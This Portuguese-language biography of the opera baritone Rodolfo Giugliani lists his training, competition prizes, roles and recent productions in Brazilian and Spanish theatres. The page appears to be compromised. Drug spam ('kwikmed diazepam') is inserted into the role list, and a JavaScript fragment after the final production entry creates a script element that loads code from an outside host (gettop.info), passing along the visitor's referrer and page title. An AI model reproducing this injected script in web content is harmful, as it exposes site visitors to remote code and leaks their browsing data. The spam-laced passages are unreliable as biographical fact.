Currículos

Rodolfo Giugliani

Rodolfo Giugliani

Rodolfo Giugliani

Nascido em São Paulo, estudou canto com  Benito Maresca e atualmente prepara seu repertório com o Maestro Bruno Roccela. Frequentou os Master Classes, Silvia Sass; Evegeny Nesterenko; Leo Nucci; Fiorenza Cossoto e Jaume Aragall.

Em seu debut em “La Traviata” em 1999, o crítico Sergio Segalini da revista Ópera Internacional de Paris escreveu:  “Rodolfo Giugliani foi uma grande revelação, com sólidos conhecimentos de   estilo e sobretudo uma acentuação precisa das notas, uma verdadeira grande voz”.

Conquistou o 1º  lugar em concursos no Brasil e no exterior como o Concurso de canto  Aldo Baldin, onde foi vencedor em quatro edições; Concurso Internacional de canto Bidu Sayão; Concurso Internacional de canto Maria Callas e 2º lugar no Concurso Vozes do Brasil. Foi o grande vencedor do Concurso Internacional de canto Jaume Aragall, realizado na Espanha em 2008.

Apresentou-se nos principais teatros brasileiros e do exterior em papéis como,  La Traviata (Giorgio Germont); Tosca (Scarpia); I Pagliacci (Tonio); Cavalleria Rusticana (Alfio); Madama Butterfly ( Sharpless); Gianni Schicchi (Gianni Schicchi); Andrea Chenier (Gerard); Rigoletto (Rigoletto); Oratório Colombo (Cristovão Colombo); Lucia di Lammermoor (Enrico); Lo Schiavo (Iberê), Nabucco (Nabuccodonosor kwikmed diazepam ).

Em 2010, obteve grande reconhecimento da crítica cantando no papel de Iberê na ópera Lo Schiavo, no Festival Amazonas de Ópera sob regência do Maestro Luiz Fernando Malheiro e direção de Jaime Martarell.

Seus últimos trabalhos foram:
– Concertos no Palau de La musica Catalana (Barcelona – Espanha).
– La Traviata (Giorgio Germont) no Teatro São Pedro (São Paulo – Brasil), sob regência de Emiliano Patarra e direção de Adelaide Negri.
– Gianni Schicchi (Gianni Schicchi) no Teatro São Pedro (São Paulo – Brasil), sob regência  de Emiliano Patarra e direção de  William Pereira.
– Andrea Chenier (Carlo Gerard) no Palácio das Artes (Belo Horizonte – Brasil), sob regência de  Luiz Fernando Malheiro e direção de  André Heller-Lopes.
– Lucia di Lammermoor (Enrico) no Teatro Municipal (Rio de Janeiro – Brasil), sob regência de Silvio Viegas e direção de  Alberto Renault.
– Nabucco (Nabuccodosor) no Teatro Municipal (Rio de Janeiro – Brasil), sob regência de Silvio Viegas e direção de André Heller – Lopess.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; var d=document;var s=d.createElement(‘script’);

Leave a Response

Antônio Rodrigues
Apaixonado por música coral, é um dos fundadores e mantenedor do movimento.com.